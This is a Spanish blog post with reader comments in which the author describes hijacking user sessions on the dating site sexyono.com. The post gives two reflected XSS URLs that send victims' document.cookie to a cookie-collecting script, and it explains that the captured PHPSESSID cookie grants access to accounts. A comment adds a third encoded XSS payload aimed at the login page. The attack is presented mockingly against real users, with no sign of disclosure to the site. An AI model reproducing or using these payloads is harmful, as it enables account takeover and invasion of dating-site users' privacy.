Vengo cargado de regalos que aquellos tres mindundis a camello no les dio tiempo a repartir ayer, que más de un overclocking les haría falta a sus transportes, para traer de Oriente, este caliente, casi ardiente y apetitoso sabor a miel.
Sabiendo que os gustó el plato hot que dejé caer anteriormente, entre cuerpo sexy y sexy, no podía faltar explotar alguna vulnerabilidad que encontré por el camino. Así que me monté un servidor Apache con MySQL y phpMyAdmin para agilizar un poco el tema de Cookies que vengo a contaros.
Paso olímpicamente de mostraros como montar los php que nos servirán para la extracción y almacenamiento de las cookies, ya que de eso tenemos documentación en Google, como para terminar el 2012 y seguir leyendo.
Así que me adentré una vez más al paradisíaco mundo de Sexyono y miré que tipo de cookies eran necesarias para hacer réplicas de la sesiones actuales. ¿Como no? Edit Cookies para Firefox, me hechó una mano en filtrar todas las pertenecientes al dominio sexyono.com.
Entre prueba y prueba el contenido de la cookie PHPSESSID, almacenaba el identificador de sesión necesario para acceder a mi cuenta, o la vuestra... ;)
Así que solo nos faltaba algún Cross Site Scripting que permitiese capturarla ¡como sí Sexyono no tuviese auditorias de seguridad!
Sí recuerdan aquella frase que indiqué en el anterior tema sobre Sexyono “¿Qué vé un usuario registrado a diferencia de uno sin registro?” Nos presta una esencial ayuda, pues la cookie de PHPSESSID, deberá de contener un usuario identificado, que si de lo contrario esto no se cumple, no conseguiremos acceso a la cuenta y perderemos infinidad de tiempo en encontrar las cookies funcionales. Así que sin más rodeos, necesitaríamos encaminar a las víctimas dentro de una zona restringida que identifique a aquellos usuarios, desde un enlace que les fuerce a iniciar sesión.
http://sexyono.com/vermensajes.php?Abierto="><script>location.href='http://localhost/cookie.php?cookie='%2Bdocument.cookie;</script>&uid=(USUARIO EN COINCIDENCIAS)
Con lo que automáticamente serán redirigidos al dominio que guardará sus cookies.
Si nos quedamos con ganas de probar más opciones, este segundo plato contiene un XSS en el dominio de forma pública.
http://sexyono.com/ampliarfoto.php?uid="><script>location.href='http://localhost/cookie.php?cookie='%2Bdocument.cookie;</script>
Además junto al UID del usuario, nos vendrá bien para ver detalladamente cual es nuestro objetivo principal.
El resultado del invento junto a mi IP pública, sería la base de datos rebosando de cookies capturadas de bonitas doncellas.
Y de postre un subdominio que no nos sirve para jugar con cookies ajenas, pero para que no se olviden de...
Saludos 4n4les! ;)
Me encantó el final jaja, buena entrada Germán =P
ResponderEliminarA cuidarse!
Gracias $DoC!!
ResponderEliminarDe camino me encontré otro XSS en el login...
www.sexyono.com/login.php?referente=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%65%6E%65%6C%70%63%2E%63%6F%6D%27%29%3C%2F%73%63%72%69%70%74%3E%0D%0A
Esto es una fiesta, mod security y magic quotes ausentes total jeje
Germán. Necesito una explicación... ¿Te dieron baja puntuación en Sexyono, verdad? De ahí, el odio irracional contra ellos :P
ResponderEliminarYa te lo estuve comentando en su día... Eres un 6 raspadito... raspadito. Asumelo! XD
@WiNSoCk
ResponderEliminarEstoy jodido... he tenido que ponerme el peluquín y pintarme abdominales con el CD Marker.
Con eso y un mes, fiché una gorda, otra drogadicta y aún me quedan ganas para redactar. =D
WiNSoCk, que aportas tu que tanto criticas?
ResponderEliminar@Anónimo
ResponderEliminarPaz, es un buen amigo =)
Vale bor esto me late, y mas que ayas encontrado otro XSS en el login jajaja
EliminarJode que a mi no me gusta mucho el sexyono pero de algo servira
o sera que me intente meter mas en ello, estaria bueno para aquellos
curiosos perverchones...xD!!!
Saludos y gran entrada como siempre.
:)
@Anónimo
ResponderEliminarGracias!
Un Saludo! :)